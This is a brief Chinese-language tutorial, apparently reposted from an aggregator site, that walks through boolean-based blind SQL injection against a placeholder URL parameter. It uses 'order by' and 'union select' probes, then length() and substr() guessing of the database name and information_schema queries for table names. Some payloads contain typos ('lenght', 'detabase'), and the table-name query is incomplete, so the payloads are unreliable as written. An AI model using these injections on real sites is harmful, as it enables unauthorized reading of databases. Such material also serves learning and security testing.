• 首先判斷注入類型

假設為：url /?id=1

• 判斷字段數

url /?id=1 order by 3

假設在3時頁面正常，在4時頁面報錯，

• 判斷回顯

url /?id=1 union select 1，2，3

假設沒有回顯說明是布爾類型

布爾盲注

• 首先判斷數據庫的庫名長度，利用length()來獲取數據庫的庫名長度

url /?id=1 and lenght(database())=1 --+

異常就錯了，就說明database的字段長度不為1，所以可以從1一直加，加到等于n頁面不顯示異常為止，就說明database的字段長度就為n

• 對數據庫名進行盲注，利用substr（）來獲取數據庫名

url /?id=1 and substr(detabase(),1,1)='s'

已知有n個字段長度，可以一個一個試出來

• 對表名進行盲注，利用substr（）來獲取表名

url /?id=1 and (select table_name from information_schema.tables where table_schema='security' )

• 對字段進行盲注，獲取字段名

• 利用已知表名，庫名，字段名來盲猜表里的值

總結

以上是生活随笔為你收集整理的sql盲注过程的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。